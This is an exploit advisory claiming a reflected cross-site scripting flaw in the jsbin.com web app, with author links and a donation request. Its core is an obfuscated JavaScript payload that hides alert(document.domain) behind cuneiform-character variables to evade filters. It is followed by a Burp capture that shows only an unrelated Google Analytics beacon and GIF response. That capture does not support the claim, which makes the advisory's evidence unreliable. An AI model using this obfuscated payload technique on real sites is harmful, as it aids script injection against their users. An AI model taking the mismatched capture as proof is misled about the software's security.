# Titles: jsbin-web app - XSS Reflected # Author: nu11secur1ty # Date: 07/15/2025 # Vendor: https://jsbin.com/ # Software: https://jsbin.com/?css,js,output # Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: An attacker can execute a malicious JavaScript in the convert function of this app. This is an encoding vulnerability low sanitizing problem. It depends on the scenario; the attacker can try any technique, and when he is successful, he can get or print sensitive information for some other attacks. [+]Exploit: ``` 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+'(alert(document.domain))')() ``` ### Burp ``` GET /collect?v=1&_v=j101&a=1533662127&t=event&_s=6&dl=https%3A%2F%2F34.203.44.8%2F%3Fcss%2Cjs%2Coutput&ul=en-us&de=UTF-8&dt=JS%20Bin%20-%20Collaborative%20JavaScript%20Debugging&sd=24-bit&sr=1536x864&vp=1163x652&je=0&ec=button&ea=run%20with%20js&_u=KGBAgEAjAAAAAGAAI~&jid=&gjid=&cid=1833133753.1750669799&tid=UA-1656750-13&_gid=1639340870.1750669799&z=1616538348 HTTP/2 Host: www.google-analytics.com Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Sec-Ch-Ua-Mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://34.203.44.8/ Accept-Encoding: gzip, deflate, br Priority: i ``` ### Resp: ``` HTTP/2 200 OK Access-Control-Allow-Origin: * Pragma: no-cache X-Content-Type-Options: nosniff Cross-Origin-Resource-Policy: cross-origin Server: Golfe2 Content-Length: 35 Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:163:0 Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=ascnsrsgac:163:0 Report-To: {"group":"ascnsrsgac:163:0","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:163:0"}],} Date: Mon, 23 Jun 2025 06:22:09 GMT Expires: Mon, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Age: 10103 Last-Modified: Sun, 17 May 1998 03:00:00 GMT Content-Type: image/gif Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 GIF89a
``` # Video: [href](https://www.youtube.com/watch?v=hqLnC7UTBhU) # Source: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/jsbin.com) # Buy me a coffee if you are not ashamed: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) # Source download [href](https://nu11secur1ty.github.io/DownGit/#/home?url=https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/jsbin.com) # Time spent: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>